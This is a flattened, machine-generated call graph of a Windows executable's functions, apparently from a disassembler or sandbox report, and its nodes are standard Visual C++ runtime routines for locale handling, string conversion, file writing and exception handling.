16487 40bc21 16486->16487 16487->16453 16489 40bba8 __encode_pointer 7 API calls 16488->16489 16490 40c1d3 16489->16490 16490->16456 16491->16283 16494 40e24e 16492->16494 16495 40e2bb 16494->16495 16502 41440a 16494->16502 16496 40e3b9 16495->16496 16497 41440a 74 API calls _parse_cmdline 16495->16497 16496->16329 16496->16332 16497->16495 16499 411356 16498->16499 16500 41135d 16498->16500 16724 4111b3 16499->16724 16500->16323 16505 4143b7 16502->16505 16508 409ddd 16505->16508 16509 409df0 16508->16509 16515 409e3d 16508->16515 16516 40be6f 16509->16516 16512 409e1d 16512->16515 16536 410eae 16512->16536 16515->16494 16517 40bdf6 __getptd_noexit 64 API calls 16516->16517 16518 40be77 16517->16518 16519 409df5 16518->16519 16520 40db05 __amsg_exit 64 API calls 16518->16520 16519->16512 16521 409021 16519->16521 16520->16519 16522 40902d _fgetc 16521->16522 16523 40be6f __getptd 64 API calls 16522->16523 16524 409032 16523->16524 16525 409060 16524->16525 16527 409044 16524->16527 16526 40c69c __lock 64 API calls 16525->16526 16528 409067 16526->16528 16529 40be6f __getptd 64 API calls 16527->16529 16552 408fe3 16528->16552 16531 409049 16529->16531 16533 409057 _fgetc 16531->16533 16535 40db05 __amsg_exit 64 API calls 16531->16535 16533->16512 16535->16533 16537 410eba _fgetc 16536->16537 16538 40be6f __getptd 64 API calls 16537->16538 16539 410ebf 16538->16539 16540 40c69c __lock 64 API calls 16539->16540 16544 410ed1 16539->16544 16541 410eef 16540->16541 16542 410f38 16541->16542 16545 410f20 InterlockedIncrement 16541->16545 16546 410f06 InterlockedDecrement 16541->16546 16720 410f49 16542->16720 16543 410edf _fgetc 16543->16515 16544->16543 16548 40db05 __amsg_exit 64 API calls 16544->16548 16545->16542 16546->16545 16549 410f11 16546->16549 16548->16543 16549->16545 16550 4055ff __crtGetStringTypeA_stat 64 API calls 16549->16550 16551 410f1f 16550->16551 16551->16545 16553 408fe7 16552->16553 16554 409019 16552->16554 16553->16554 16555 408e95 ___addlocaleref 8 API calls 16553->16555 16560 40908b 16554->16560 16556 408ffa 16555->16556 16556->16554 16563 408f24 16556->16563 16719 40c5c2 LeaveCriticalSection 16560->16719 16562 409092 16562->16531 16564 408f35 InterlockedDecrement 16563->16564 16565 408fb8 16563->16565 16566 408f4a InterlockedDecrement 16564->16566 16567 408f4d 16564->16567 16565->16554 16577 408d4c 16565->16577 16566->16567 16568 408f57 InterlockedDecrement 16567->16568 16569 408f5a 16567->16569 16568->16569 16570 408f64 InterlockedDecrement 16569->16570 16571 408f67 16569->16571 16570->16571 16572 408f71 InterlockedDecrement 16571->16572 16574 408f74 16571->16574 16572->16574 16573 408f8d InterlockedDecrement 16573->16574 16574->16573 16575 408f9d InterlockedDecrement 16574->16575 16576 408fa8 InterlockedDecrement 16574->16576 16575->16574 16576->16565 16578 408dd0 16577->16578 16584 408d63 16577->16584 16579 408e1d 16578->16579 16580 4055ff __crtGetStringTypeA_stat 64 API calls 16578->16580 16594 408e44 16579->16594 16631 410517 16579->16631 16582 408df1 16580->16582 16587 4055ff __crtGetStringTypeA_stat 64 API calls 16582->16587 16584->16578 16585 408d97 16584->16585 16590 4055ff __crtGetStringTypeA_stat 64 API calls 16584->16590 16586 408db8 16585->16586 16597 4055ff __crtGetStringTypeA_stat 64 API calls 16585->16597 16588 4055ff __crtGetStringTypeA_stat 64 API calls 16586->16588 16592 408e04 16587->16592 16593 408dc5 16588->16593 16589 4055ff __crtGetStringTypeA_stat 64 API calls 16589->16594 16595 408d8c 16590->16595 16591 408e89 16596 4055ff __crtGetStringTypeA_stat 64 API calls 16591->16596 16599 4055ff __crtGetStringTypeA_stat 64 API calls 16592->16599 16600 4055ff __crtGetStringTypeA_stat 64 API calls 16593->16600 16594->16591 16598 4055ff 64 API calls __crtGetStringTypeA_stat 16594->16598 16607 410934 16595->16607 16602 408e8f 16596->16602 16603 408dad 16597->16603 16598->16594 16604 408e12 16599->16604 16600->16578 16602->16554 16623 410725 16603->16623 16606 4055ff __crtGetStringTypeA_stat 64 API calls 16604->16606 16606->16579 16608 410941 16607->16608 16622 4109be 16607->16622 16609 410952 16608->16609 16610 4055ff __crtGetStringTypeA_stat 64 API calls 16608->16610 16611 410964 16609->16611 16612 4055ff __crtGetStringTypeA_stat 64 API calls 16609->16612 16610->16609 16613 410976 16611->16613 16614 4055ff __crtGetStringTypeA_stat 64 API calls 16611->16614 16612->16611 16615 4055ff __crtGetStringTypeA_stat 64 API calls 16613->16615 16619 410988 16613->16619 16614->16613 16615->16619 16616 4055ff __crtGetStringTypeA_stat 64 API calls 16617 41099a 16616->16617 16618 4109ac 16617->16618 16620 4055ff __crtGetStringTypeA_stat 64 API calls 16617->16620 16621 4055ff __crtGetStringTypeA_stat 64 API calls 16618->16621 16618->16622 16619->16616 16619->16617 16620->16618 16621->16622 16622->16585 16624 410732 16623->16624 16630 410766 16623->16630 16625 4055ff __crtGetStringTypeA_stat 64 API calls 16624->16625 16626 410742 16624->16626 16625->16626 16627 4055ff __crtGetStringTypeA_stat 64 API calls 16626->16627 16628 410754 16626->16628 16627->16628 16629 4055ff __crtGetStringTypeA_stat 64 API calls 16628->16629 16628->16630 16629->16630 16630->16586 16632 408e3d 16631->16632 16633 410528 16631->16633 16632->16589 16634 4055ff __crtGetStringTypeA_stat 64 API calls 16633->16634 16635 410530 16634->16635 16636 4055ff __crtGetStringTypeA_stat 64 API calls 16635->16636 16637 410538 16636->16637 16638 4055ff __crtGetStringTypeA_stat 64 API calls 16637->16638 16639 410540 16638->16639 16640 4055ff __crtGetStringTypeA_stat 64 API calls 16639->16640 16641 410548 16640->16641 16642 4055ff __crtGetStringTypeA_stat 64 API calls 16641->16642 16643 410550 16642->16643 16644 4055ff __crtGetStringTypeA_stat 64 API calls 16643->16644 16645 410558 16644->16645 16646 4055ff __crtGetStringTypeA_stat 64 API calls 16645->16646 16647 41055f 16646->16647 16648 4055ff __crtGetStringTypeA_stat 64 API calls 16647->16648 16649 410567 16648->16649 16650 4055ff __crtGetStringTypeA_stat 64 API calls 16649->16650 16651 41056f 16650->16651 16652 4055ff __crtGetStringTypeA_stat 64 API calls 16651->16652 16653 410577 16652->16653 16654 4055ff __crtGetStringTypeA_stat 64 API calls 16653->16654 16655 41057f 16654->16655 16656 4055ff __crtGetStringTypeA_stat 64 API calls 16655->16656 16657 410587 16656->16657 16658 4055ff __crtGetStringTypeA_stat 64 API calls 16657->16658 16659 41058f 16658->16659 16660 4055ff __crtGetStringTypeA_stat 64 API calls 16659->16660 16661 410597 16660->16661 16662 4055ff __crtGetStringTypeA_stat 64 API calls 16661->16662 16663 41059f 16662->16663 16664 4055ff __crtGetStringTypeA_stat 64 API calls 16663->16664 16665 4105a7 16664->16665 16666 4055ff __crtGetStringTypeA_stat 64 API calls 16665->16666 16667 4105b2 16666->16667 16668 4055ff __crtGetStringTypeA_stat 64 API calls 16667->16668 16669 4105ba 16668->16669 16670 4055ff __crtGetStringTypeA_stat 64 API calls 16669->16670 16671 4105c2 16670->16671 16672 4055ff __crtGetStringTypeA_stat 64 API calls 16671->16672 16673 4105ca 16672->16673 16674 4055ff __crtGetStringTypeA_stat 64 API calls 16673->16674 16675 4105d2 16674->16675 16676 4055ff __crtGetStringTypeA_stat 64 API calls 16675->16676 16677 4105da 16676->16677 16678 4055ff __crtGetStringTypeA_stat 64 API calls 16677->16678 16679 4105e2 16678->16679 16680 4055ff __crtGetStringTypeA_stat 64 API calls 16679->16680 16681 4105ea 16680->16681 16682 4055ff __crtGetStringTypeA_stat 64 API calls 16681->16682 16719->16562 16723 40c5c2 LeaveCriticalSection 16720->16723 16722 410f50 16722->16544 16723->16722 16725 4111bf _fgetc 16724->16725 16726 40be6f __getptd 64 API calls 16725->16726 16727 4111c8 16726->16727 16728 410eae _LocaleUpdate::_LocaleUpdate 66 API calls 16727->16728 16729 4111d2 16728->16729 16755 410f52 16729->16755 16732 40a861 __malloc_crt 64 API calls 16733 4111f3 16732->16733 16734 411312 _fgetc 16733->16734 16762 410fce 16733->16762 16734->16500 16737 411223 InterlockedDecrement 16739 411233 16737->16739 16740 411244 InterlockedIncrement 16737->16740 16738 41131f 16738->16734 16742 4055ff __crtGetStringTypeA_stat 64 API calls 16738->16742 16746 411332 16738->16746 16739->16740 16744 4055ff __crtGetStringTypeA_stat 64 API calls 16739->16744 16740->16734 16741 41125a 16740->16741 16741->16734 16745 40c69c __lock 64 API calls 16741->16745 16742->16746 16743 40a982 __fclose_nolock 64 API calls 16743->16734 16747 411243 16744->16747 16749 41126e InterlockedDecrement 16745->16749 16746->16743 16747->16740 16750 4112ea 16749->16750 16751 4112fd InterlockedIncrement 16749->16751 16750->16751 16753 4055ff __crtGetStringTypeA_stat 64 API calls 16750->16753 16772 411314 16751->16772 16754 4112fc 16753->16754 16754->16751 16756 409ddd _LocaleUpdate::_LocaleUpdate 74 API calls 16755->16756 16757 410f66 16756->16757 16758 410f71 GetOEMCP 16757->16758 16759 410f8f 16757->16759 16761 410f81 16758->16761 16760 410f94 GetACP 16759->16760 16759->16761 16760->16761 16761->16732 16761->16734 16763 410f52 getSystemCP 76 API calls 16762->16763 16765 410fee 16763->16765 16764 411062 _memset __setmbcp_nolock 16775 410d1b GetCPInfo 16764->16775 16765->16764 16766 410ff9 setSBCS 16765->16766 16768 41103d IsValidCodePage 16765->16768 16767 4070b5 __crtGetStringTypeA_stat 5 API calls 16766->16767 16769 4111b1 16767->16769 16768->16766 16770 41104f GetCPInfo 16768->16770 16769->16737 16769->16738 16770->16764 16770->16766 16908 40c5c2 LeaveCriticalSection 16772->16908 16774 41131b 16774->16734 16776 410e01 16775->16776 16778 410d4f _memset 16775->16778 16781 4070b5 __crtGetStringTypeA_stat 5 API calls 16776->16781 16785 411dfa 16778->16785 16783 410eac 16781->16783 16783->16764 16784 40a209 ___crtLCMapStringA 99 API calls 16784->16776 16786 409ddd _LocaleUpdate::_LocaleUpdate 74 API calls 16785->16786 16787 411e0d 16786->16787 16795 411c40 16787->16795 16790 40a209 16791 409ddd _LocaleUpdate::_LocaleUpdate 74 API calls 16790->16791 16792 40a21c 16791->16792 16861 409e64 16792->16861 16796 411c61 GetStringTypeW 16795->16796 16797 411c8c 16795->16797 16798 411c81 GetLastError 16796->16798 16799 411c79 16796->16799 16797->16799 16800 411d73 16797->16800 16798->16797 16801 411cc5 MultiByteToWideChar 16799->16801 16818 411d6d 16799->16818 16823 411f40 GetLocaleInfoA 16800->16823 16808 411cf2 16801->16808 16801->16818 16803 4070b5 __crtGetStringTypeA_stat 5 API calls 16805 410dbc 16803->16805 16805->16790 16806 411dc4 GetStringTypeA 16811 411ddf 16806->16811 16806->16818 16807 411d07 _memset __crtGetStringTypeA_stat 16810 411d40 MultiByteToWideChar 16807->16810 16807->16818 16808->16807 16812 40c3ef _malloc 64 API calls 16808->16812 16814 411d67 16810->16814 16815 411d56 GetStringTypeW 16810->16815 16816 4055ff __crtGetStringTypeA_stat 64 API calls 16811->16816 16812->16807 16819 409dbd 16814->16819 16815->16814 16816->16818 16818->16803 16820 409dc9 16819->16820 16821 409dda 16819->16821 16820->16821 16822 4055ff __crtGetStringTypeA_stat 64 API calls 16820->16822 16821->16818 16822->16821 16824 411f73 16823->16824 16825 411f6e 16823->16825 16854 41502f 16824->16854 16827 4070b5 __crtGetStringTypeA_stat 5 API calls 16825->16827 16828 411d97 16827->16828 16828->16806 16828->16818 16829 411f89 16828->16829 16830 411fc9 GetCPInfo 16829->16830 16831 412053 16829->16831 16832 411fe0 16830->16832 16833 41203e MultiByteToWideChar 16830->16833 16834 4070b5 __crtGetStringTypeA_stat 5 API calls 16831->16834 16832->16833 16835 411fe6 GetCPInfo 16832->16835 16833->16831 16838 411ff9 _strlen 16833->16838 16836 411db8 16834->16836 16835->16833 16837 411ff3 16835->16837 16836->16806 16836->16818 16837->16833 16837->16838 16839 40c3ef _malloc 64 API calls 16838->16839 16843 41202b _memset __crtGetStringTypeA_stat 16838->16843 16839->16843 16840 412088 MultiByteToWideChar 16841 4120a0 16840->16841 16842 4120bf 16840->16842 16845 4120c4 16841->16845 16846 4120a7 WideCharToMultiByte 16841->16846 16844 409dbd __freea 64 API calls 16842->16844 16843->16831 16843->16840 16844->16831 16847 4120e3 16845->16847 16848 4120cf WideCharToMultiByte 16845->16848 16846->16842 16849 40a8a6 __calloc_crt 64 API calls 16847->16849 16848->16842 16848->16847 16850 4120eb 16849->16850 16850->16842 16851 4120f4 WideCharToMultiByte 16850->16851 16851->16842 16852 412106 16851->16852 16853 4055ff __crtGetStringTypeA_stat 64 API calls 16852->16853 16853->16842 16857 417455 16854->16857 16858 41746e 16857->16858 16859 417226 strtoxl 88 API calls 16858->16859 16860 415040 16859->16860 16860->16825 16862 409e85 LCMapStringW 16861->16862 16865 409ea0 16861->16865 16863 409ea8 GetLastError 16862->16863 16862->16865 16863->16865 16864 40a09e 16867 411f40 ___ansicp 88 API calls 16864->16867 16865->16864 16866 409efa 16865->16866 16868 409f13 MultiByteToWideChar 16866->16868 16891 40a095 16866->16891 16870 40a0c6 16867->16870 16875 409f40 16868->16875 16868->16891 16869 4070b5 __crtGetStringTypeA_stat 5 API calls 16871 40a207 16869->16871 16872 40a1ba LCMapStringA 16870->16872 16873 40a0df 16870->16873 16870->16891 16871->16784 16876 40a116 16872->16876 16877 411f89 ___convertcp 71 API calls 16873->16877 16874 409f91 MultiByteToWideChar 16878 409faa LCMapStringW 16874->16878 16879 40a08c 16874->16879 16881 40c3ef _malloc 64 API calls 16875->16881 16888 409f59 __crtGetStringTypeA_stat 16875->16888 16880 40a1e1 16876->16880 16884 4055ff __crtGetStringTypeA_stat 64 API calls 16876->16884 16882 40a0f1 16877->16882 16878->16879 16883 409fcb 16878->16883 16886 409dbd __freea 64 API calls 16879->16886 16889 4055ff __crtGetStringTypeA_stat 64 API calls 16880->16889 16880->16891 16881->16888 16885 40a0fb LCMapStringA 16882->16885 16882->16891 16887 409fd4 16883->16887 16894 409ffd 16883->16894 16884->16880 16885->16876 16892 40a11d 16885->16892 16886->16891 16887->16879 16890 409fe6 LCMapStringW 16887->16890 16888->16874 16888->16891 16889->16891 16890->16879 16891->16869 16895 40a12e _memset __crtGetStringTypeA_stat 16892->16895 16896 40c3ef _malloc 64 API calls 16892->16896 16893 40a04c LCMapStringW 16897 40a064 WideCharToMultiByte 16893->16897 16898 40a086 16893->16898 16899 40a018 __crtGetStringTypeA_stat 16894->16899 16900 40c3ef _malloc 64 API calls 16894->16900 16895->16876 16902 40a16c LCMapStringA 16895->16902 16896->16895 16897->16898 16901 409dbd __freea 64 API calls 16898->16901 16899->16879 16899->16893 16900->16899 16901->16879 16904 40a188 16902->16904 16905 40a18c 16902->16905 16907 409dbd __freea 64 API calls 16904->16907 16906 411f89 ___convertcp 71 API calls 16905->16906 16906->16904 16907->16876 16908->16774 16916 406d10 16909->16916 16911 405102 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16912 4051d2 __invoke_watson 16911->16912 16913 4051de GetCurrentProcess TerminateProcess 16911->16913 16912->16913 16914 4070b5 __crtGetStringTypeA_stat 5 API calls 16913->16914 16915 4051fb 16914->16915 16915->16346 16917 406d1c __VEC_memzero 16916->16917 16917->16911 16919 40b8d2 16918->16919 16920 40bba8 __encode_pointer 7 API calls 16919->16920 16921 40b8ea 16919->16921 16920->16919 16921->16351 16924 41f6d2 std::_Locinfo::_Locinfo_ctor 16922->16924 17029 41eb90 16924->17029 16930 41f736 16931 41f745 std::ios_base::width 16930->16931 17034 41ffa0 16930->17034 17037 41e1a0 16931->17037 16942 41d9a2 16932->16942 16933 41d9d1 16935 41da0e 16933->16935 16936 41d9ee 16933->16936 16934 41f6a0 115 API calls 16934->16942 16938 41da36 16935->16938 16939 41da16 16935->16939 16937 41f6a0 115 API calls 16936->16937 16944 41da02 16937->16944 16940 41f6a0 115 API calls 16938->16940 16941 41f6a0 115 API calls 16939->16941 16940->16944 16941->16944 16942->16933 16942->16934 16943 41db70 132 API calls 16943->16944 16944->16943 16947 41da7f 16944->16947 16945 41db2e 16945->16364 16946 41db70 132 API calls 16946->16947 16947->16945 16947->16946 16948 41f6a0 115 API calls 16947->16948 16948->16947 16950 4192a0 16949->16950 16959 41c7e2 ctype 16950->16959 17382 418cf0 16950->17382 16952 41c9da 17386 418b20 16952->17386 16954 41ca8a 16955 41ccf2 16954->16955 17389 419020 16954->17389 16955->16367 16959->16367 16961 41eb90 78 API calls 16960->16961 16962 41dba8 16961->16962 16972 41dbe5 16962->16972 17471 41dde0 16962->17471 16963 41e1a0 77 API calls 16965 41dcea 16963->16965 16967 41ec10 78 API calls 16965->16967 16969 41dcf8 16967->16969 16969->16379 16972->16963 17907 41e390 16973->17907 16975 41f98b 16976 41dde0 2 API calls 16975->16976 16979 41fa9d std::ios_base::width 16975->16979 16977 41f9b4 16976->16977 17912 41ee80 16977->17912 16981 41e1a0 77 API calls 16979->16981 16983 41fb5b 16981->16983 16982 41dd10 ctype 2 API calls 16984 41f9c8 16982->16984 17930 41e370 16983->17930 16992 41fbb1 std::_Locinfo::_Locinfo_ctor 16990->16992 16991 41eb90 78 API calls 16999 41fc14 16991->16999 16992->16991 16998 41fc23 std::ios_base::width 16999->16998 17990 402330 16999->17990 17047 41e940 17029->17047 17031 41eba3 17032 41ebe7 17031->17032 17051 41e0f0 17031->17051 17032->16930 17062 402bfe 17034->17062 17038 41e1c6 17037->17038 17039 41e1ad std::ios_base::fail 17037->17039 17041 41ec10 17038->17041 17325 41e410 17039->17325 17042 41ec1c 17041->17042 17043 41ec2d 17042->17043 17371 41ed80 17042->17371 17367 41e3d0 17043->17367 17049 41e965 17047->17049 17048 41e984 17048->17031 17049->17048 17055 41ee10 17049->17055 17052 41e112 std::ios_base::fail 17051->17052 17053 41e1a0 77 API calls 17052->17053 17054 41e154 17053->17054 17054->17032 17058 403b58 17055->17058 17061 40486c EnterCriticalSection 17058->17061 17060 403b5f 17060->17048 17061->17060 17063 402c73 17062->17063 17065 402c11 17062->17065 17063->16931 17064 4020f0 std::locale::_Locimp::~_Locimp 65 API calls 17064->17065 17065->17063 17065->17064 17067 403244 17065->17067 17068 403250 __EH_prolog3_GS 17067->17068 17070 40325a 17068->17070 17072 4032ac 17068->17072 17073 40329d 17068->17073 17069 407177 ctype 5 API calls 17071 403261 17069->17071 17070->17069 17071->17065 17096 4025f0 17072->17096 17093 402d7b 17073->17093 17077 402f73 ctype 7 API calls 17078 4032c9 17077->17078 17079 40297b ctype 7 API calls 17078->17079 17080 4032d0 17079->17080 17081 402f73 ctype 7 API calls 17080->17081 17082 4032e1 17081->17082 17083 40297b ctype 7 API calls 17082->17083 17086 4032e8 17083->17086 17084 4033c2 17085 402d7b _Fputc 100 API calls 17084->17085 17088 4033c0 17084->17088 17085->17088 17086->17084 17086->17088 17089 402000 ctype 77 API calls 17086->17089 17091 402f73 7 API calls ctype 17086->17091 17092 40297b 7 API calls ctype 17086->17092 17102 40793f 17086->17102 17087 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 17087->17088 17088->17087 17089->17086 17091->17086 17092->17086 17115 40728a 17093->17115 17095 402d8d 17095->17070 17097 402601 std::locale::_Locimp::_Locimp 17096->17097 17098 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 17097->17098 17099 402615 17098->17099 17297 4026a0 17099->17297 17101 402626 17101->17077 17103 40794b _fgetc 17102->17103 17104 407983 17103->17104 17105 407963 17103->17105 17107 407978 _fgetc 17103->17107 17108 407e8b __lock_file 65 API calls 17104->17108 17106 40a982 __fclose_nolock 64 API calls 17105->17106 17109 407968 17106->17109 17107->17086 17110 40798b 17108->17110 17111 4051fd __fclose_nolock 7 API calls 17109->17111 17303 4077dd 17110->17303 17111->17107 17116 407296 _fgetc 17115->17116 17117 4072c9 17116->17117 17118 4072a9 17116->17118 17120 407e8b __lock_file 65 API calls 17117->17120 17119 40a982 __fclose_nolock 64 API calls 17118->17119 17121 4072ae 17119->17121 17122 4072cf 17120->17122 17123 4051fd __fclose_nolock 7 API calls 17121->17123 17124 40eb22 __fileno 64 API calls 17122->17124 17126 407349 17122->17126 17129 4072be _fgetc 17123->17129 17130 4072df 17124->17130 17128 40735a 17126->17128 17134 40d462 17126->17134 17155 40738e 17128->17155 17129->17095 17130->17126 17131 40a982 __fclose_nolock 64 API calls 17130->17131 17132 407339 17131->17132 17133 4051fd __fclose_nolock 7 API calls 17132->17133 17133->17126 17135 40eb22 __fileno 64 API calls 17134->17135 17136 40d472 17135->17136 17137 40d494 17136->17137 17138 40d47d 17136->17138 17140 40d498 17137->17140 17148 40d4a5 __flsbuf 17137->17148 17139 40a982 __fclose_nolock 64 API calls 17138->17139 17142 40d482 17139->17142 17141 40a982 __fclose_nolock 64 API calls 17140->17141 17141->17142 17142->17128 17143 40d595 17158 40f2d0 17143->17158 17144 40d515 17146 40d52c 17144->17146 17150 40d549 17144->17150 17147 40f2d0 __locking 98 API calls 17146->17147 17147->17142 17148->17142 17151 40d4fb 17148->17151 17154 40d506 17148->17154 17183 41337b 17148->17183 17150->17142 17192 413262 17150->17192 17153 40eb54 __getbuf 64 API calls 17151->17153 17151->17154 17153->17154 17154->17143 17154->17144 17156 407efe _ungetc 2 API calls 17155->17156 17157 407394 17156->17157 17157->17129 17159 40f2dc _fgetc 17158->17159 17160 40f2e4 17159->17160 17161 40f2ff 17159->17161 17162 40a995 __read_nolock 64 API calls 17160->17162 17163 40f30d 17161->17163 17166 40f34e 17161->17166 17164 40f2e9 17162->17164 17165 40a995 __read_nolock 64 API calls 17163->17165 17167 40a982 __fclose_nolock 64 API calls 17164->17167 17168 40f312 17165->17168 17169 414e08 ___lock_fhandle 65 API calls 17166->17169 17176 40f2f1 _fgetc 17167->17176 17170 40a982 __fclose_nolock 64 API calls 17168->17170 17171 40f354 17169->17171 17172 40f319 17170->17172 17174 40f361 17171->17174 17175 40f377 17171->17175 17173 4051fd __fclose_nolock 7 API calls 17172->17173 17173->17176 17224 40eb9d 17174->17224 17178 40a982 __fclose_nolock 64 API calls 17175->17178 17176->17142 17180 40f37c 17178->17180 17179 40f36f 17291 40f3a2 17179->17291 17181 40a995 __read_nolock 64 API calls 17180->17181 17181->17179 17184 413388 17183->17184 17186 413397 17183->17186 17185 40a982 __fclose_nolock 64 API calls 17184->17185 17187 41338d 17185->17187 17188 4133bb 17186->17188 17189 40a982 __fclose_nolock 64 API calls 17186->17189 17187->17151 17188->17151 17190 4133ab 17189->17190 17191 4051fd __fclose_nolock 7 API calls 17190->17191 17191->17188 17193 41326e _fgetc 17192->17193 17194 41329b 17193->17194 17195 41327f 17193->17195 17197 4132a9 17194->17197 17199 4132ca 17194->17199 17196 40a995 __read_nolock 64 API calls 17195->17196 17198 413284 17196->17198 17200 40a995 __read_nolock 64 API calls 17197->17200 17201 40a982 __fclose_nolock 64 API calls 17198->17201 17203 413310 17199->17203 17204 4132ea 17199->17204 17202 4132ae 17200->17202 17216 41328c _fgetc 17201->17216 17207 40a982 __fclose_nolock 64 API calls 17202->17207 17206 414e08 ___lock_fhandle 65 API calls 17203->17206 17205 40a995 __read_nolock 64 API calls 17204->17205 17208 4132ef 17205->17208 17209 413316 17206->17209 17210 4132b5 17207->17210 17211 40a982 __fclose_nolock 64 API calls 17208->17211 17212 413323 17209->17212 17213 41333f 17209->17213 17214 4051fd __fclose_nolock 7 API calls 17210->17214 17215 4132f6 17211->17215 17217 4131dd __lseeki64_nolock 66 API calls 17212->17217 17218 40a982 __fclose_nolock 64 API calls 17213->17218 17214->17216 17219 4051fd __fclose_nolock 7 API calls 17215->17219 17216->17142 17220 413334 17217->17220 17221 413344 17218->17221 17219->17216 17294 413371 17220->17294 17222 40a995 __read_nolock 64 API calls 17221->17222 17222->17220 17225 40ebac __write_nolock 17224->17225 17226 40ec05 17225->17226 17227 40ebde 17225->17227 17260 40ebd3 17225->17260 17230 40ec6d 17226->17230 17231 40ec47 17226->17231 17229 40a995 __read_nolock 64 API calls 17227->17229 17228 4070b5 __crtGetStringTypeA_stat 5 API calls 17232 40f2ce 17228->17232 17233 40ebe3 17229->17233 17235 40ec73 17230->17235 17236 40ec84 17230->17236 17234 40a995 __read_nolock 64 API calls 17231->17234 17232->17179 17237 40a982 __fclose_nolock 64 API calls 17233->17237 17239 40ec4c 17234->17239 17240 4131dd __lseeki64_nolock 66 API calls 17235->17240 17238 41337b __write_nolock 64 API calls 17236->17238 17241 40ebea 17237->17241 17243 40ec8c 17238->17243 17244 40a982 __fclose_nolock 64 API calls 17239->17244 17245 40ec81 17240->17245 17242 4051fd __fclose_nolock 7 API calls 17241->17242 17242->17260 17246 40ef32 17243->17246 17251 40be6f __getptd 64 API calls 17243->17251 17247 40ec55 17244->17247 17245->17236 17249 40f201 WriteFile 17246->17249 17250 40ef42 17246->17250 17248 4051fd __fclose_nolock 7 API calls 17247->17248 17248->17260 17254 40f234 GetLastError 17249->17254 17285 40ef14 17249->17285 17252 40f020 17250->17252 17278 40ef56 17250->17278 17253 40eca7 GetConsoleMode 17251->17253 17264 40f100 17252->17264 17267 40f02f 17252->17267 17253->17246 17256 40ecd2 17253->17256 17257 40f240 17254->17257 17255 40f285 17259 40f27f 17255->17259 17256->17246 17258 40ece4 GetConsoleCP 17256->17258 17257->17259 17257->17260 17261 40f252 17257->17261 17258->17257 17284 40ed07 17258->17284 17259->17255 17259->17260 17262 40a982 __fclose_nolock 64 API calls 17259->17262 17260->17228 17265 40f271 17261->17265 17266 40f25d 17261->17266 17269 40f2a2 17262->17269 17263 40f166 WideCharToMultiByte 17263->17254 17272 40f19d WriteFile 17263->17272 17264->17255 17264->17263 17274 40a9a8 __dosmaperr 64 API calls 17265->17274 17271 40a982 __fclose_nolock 64 API calls 17266->17271 17267->17255 17273 40f0a4 WriteFile 17267->17273 17268 40efc4 WriteFile 17268->17254 17268->17278 17270 40a995 __read_nolock 64 API calls 17269->17270 17270->17260 17275 40f262 17271->17275 17277 40f1d4 GetLastError 17272->17277 17282 40f1c8 17272->17282 17273->17254 17276 40f03a 17273->17276 17274->17260 17279 40a995 __read_nolock 64 API calls 17275->17279 17276->17257 17276->17267 17276->17285 17277->17282 17278->17255 17278->17257 17278->17268 17278->17285 17279->17260 17280 412723 __write_nolock 74 API calls 17280->17284 17281 414cbd __fassign 76 API calls 17281->17284 17282->17257 17282->17264 17282->17272 17282->17285 17283 414ae1 11 API calls __putwch_nolock 17289 40ed83 17283->17289 17284->17257 17284->17280 17284->17281 17284->17285 17286 40edb3 WideCharToMultiByte 17284->17286 17287 414cbd __fassign 76 API calls 17284->17287 17284->17289 17285->17257 17286->17257 17288 40ede4 WriteFile 17286->17288 17287->17289 17288->17254 17288->17289 17289->17254 17289->17257 17289->17283 17289->17284 17289->17286 17290 40ee38 WriteFile 17289->17290 17290->17254 17290->17289 17292 414ea8 __unlock_fhandle LeaveCriticalSection 17291->17292 17293 40f3aa 17292->17293 17293->17176 17295 414ea8 __unlock_fhandle LeaveCriticalSection 17294->17295 17296 413379 17295->17296 17296->17216 17298 4026b2 17297->17298 17299 4026b7 17297->17299 17300 403a9a std::_String_base::_Xlen 77 API calls 17298->17300 17301 401810 std::_Locinfo::_Locinfo_ctor 77 API calls 17299->17301 17300->17299 17302 4026c5 std::locale::_Locimp::~_Locimp ctype 17301->17302 17302->17101 17306 4077ef 17303->17306 17315 407810 17303->17315 17304 4077fb 17305 40a982 __fclose_nolock 64 API calls 17304->17305 17307 407800 17305->17307 17306->17304 17314 40782e 17306->17314 17306->17315 17308 4051fd __fclose_nolock 7 API calls 17307->17308 17308->17315 17309 40d462 __flsbuf 98 API calls 17309->17314 17311 404970 ___crtGetEnvironmentStringsA __VEC_memcpy 17311->17314 17312 40eb22 __fileno 64 API calls 17312->17314 17313 40f2d0 __locking 98 API calls 17313->17314 17314->17309 17314->17311 17314->17312 17314->17313 17314->17315 17319 4074f9 17314->17319 17316 4079b7 17315->17316 17317 407efe _ungetc 2 API calls 17316->17317 17318 4079bf 17317->17318 17318->17107 17320 407512 17319->17320 17324 407534 17319->17324 17321 40eb22 __fileno 64 API calls 17320->17321 17320->17324 17322 40752d 17321->17322 17323 40f2d0 __locking 98 API calls 17322->17323 17323->17324 17324->17314 17326 41e422 17325->17326 17329 41e450 17326->17329 17330 41e444 17329->17330 17331 41e487 17329->17331 17330->17038 17332 41e49d 17331->17332 17333 41e48f 17331->17333 17335 41e4b4 17332->17335 17336 41e4e8 17332->17336 17334 4052cb __CxxThrowException@8 RaiseException 17333->17334 17334->17330 17339 401030 std::locale::_Locimp::_Locimp 77 API calls 17335->17339 17337 41e539 17336->17337 17338 41e4ff 17336->17338 17342 401030 std::locale::_Locimp::_Locimp 77 API calls 17337->17342 17340 401030 std::locale::_Locimp::_Locimp 77 API calls 17338->17340 17341 41e4c1 17339->17341 17343 41e50f 17340->17343 17360 41e580 17341->17360 17345 41e549 17342->17345 17346 41e580 std::bad_exception::bad_exception 77 API calls 17343->17346 17348 41e580 std::bad_exception::bad_exception 77 API calls 17345->17348 17349 41e51e 17346->17349 17351 41e55b 17348->17351 17353 4052cb __CxxThrowException@8 RaiseException 17349->17353 17350 4052cb __CxxThrowException@8 RaiseException 17354 41e4db 17350->17354 17352 4052cb __CxxThrowException@8 RaiseException 17351->17352 17355 41e56c 17352->17355 17356 41e52c 17353->17356 17357 401070 std::runtime_error::~runtime_error 66 API calls 17354->17357 17358 401070 std::runtime_error::~runtime_error 66 API calls 17355->17358 17359 401070 std::runtime_error::~runtime_error 66 API calls 17356->17359 17357->17330 17358->17330 17359->17330 17363 401300 17360->17363 17364 40130f std::bad_exception::bad_exception 17363->17364 17365 401330 std::bad_exception::bad_exception 77 API calls 17364->17365 17366 401327 17365->17366 